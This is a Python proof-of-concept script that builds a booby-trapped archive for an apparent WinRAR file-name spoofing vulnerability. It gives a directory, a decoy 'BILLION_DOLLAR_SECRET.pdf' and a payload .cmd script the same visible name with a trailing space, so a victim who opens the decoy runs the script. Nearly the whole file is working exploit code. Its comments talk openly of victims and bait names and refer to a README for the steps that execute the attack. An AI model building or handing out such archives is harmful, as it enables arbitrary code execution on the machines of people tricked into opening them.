# This code makes an effort to follow PEP 8.
# Import statements for packages and dependencies we're gonna need.
import os
import shutil
import zipfile
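# Declaring some constants here for ease of use.
# Payload script. Inside the archive it is stored as "<HOOK> /<HOOK> .cmd"
# (decoy name, trailing space, .cmd suffix) so that WinRAR's vulnerability
# (see README.md) ends up launching it when the victim opens the "document".
SNEAKY_SCRIPT = "super_sneaky_evil_script.bat"
# Decoy document whose name is meant to make the victim double-click it.
HOOK = "BILLION_DOLLAR_SECRET.pdf"
# Scratch-directory name used by the original staging approach. It is no
# longer needed (the archive is now written directly with zipfile) but is
# kept so external references to it keep resolving.
PLACEHOLDER = "PLACEHOLDER"
# Output archive. NOTE: the container written is a ZIP; the .rar suffix is
# cosmetic bait and is not what makes the trick work.
OP = "BILLION_DOLLAR_SECRET.rar"
# Extension of HOOK as bytes. The original used it to binary-patch the
# archive after the fact; retained only for backward compatibility.
HOOK_EXTENSION = b"." + HOOK.split(".")[-1].encode("utf-8")


def build_archive(script: str = SNEAKY_SCRIPT, hook: str = HOOK, output: str = OP) -> list[str]:
    """Write the booby-trapped archive and return the entry names it contains.

    With the defaults the archive holds exactly these three entries, in this
    order (note the single space after ".pdf" in every name):

        "BILLION_DOLLAR_SECRET.pdf /"                           directory
        "BILLION_DOLLAR_SECRET.pdf "                            the decoy file
        "BILLION_DOLLAR_SECRET.pdf /BILLION_DOLLAR_SECRET.pdf .cmd"  the payload

    The names are set through ``arcname`` instead of patching the finished
    ZIP bytes as the original did. Replacing every ``.pdfA``/``.pdfB`` byte
    sequence in the whole file also rewrote those bytes wherever they
    happened to occur *inside* the payload or decoy contents, silently
    corrupting them. ZIP entry names are not checksummed, so writing the
    spoofed names directly is both simpler and safe.

    Args:
        script: path to the payload script (.bat/.cmd).
        hook:   path to the decoy document; its basename drives the entry names.
        output: path of the archive to write (overwritten if present).

    Returns:
        The list of entry names written, in archive order.

    Raises:
        FileNotFoundError: if *script* or *hook* does not exist. Checked up
            front so nothing is written on a misconfigured run.
    """
    for path in (script, hook):
        if not os.path.isfile(path):
            raise FileNotFoundError(path)

    # The trailing space is the whole trick: it makes the directory, the decoy
    # and the payload all share the decoy's visible name.
    spoofed = os.path.basename(hook) + " "
    names = [spoofed + "/", spoofed, spoofed + "/" + spoofed + ".cmd"]

    with zipfile.ZipFile(output, "w", zipfile.ZIP_DEFLATED) as zf:
        # Explicit directory entry, matching what shutil.make_archive emitted.
        zf.writestr(names[0], b"")
        zf.write(hook, arcname=names[1])
        zf.write(script, arcname=names[2])
    return names


if __name__ == "__main__":
    build_archive()
    # After this, refer to README.md for more instructions on how to execute the exploit.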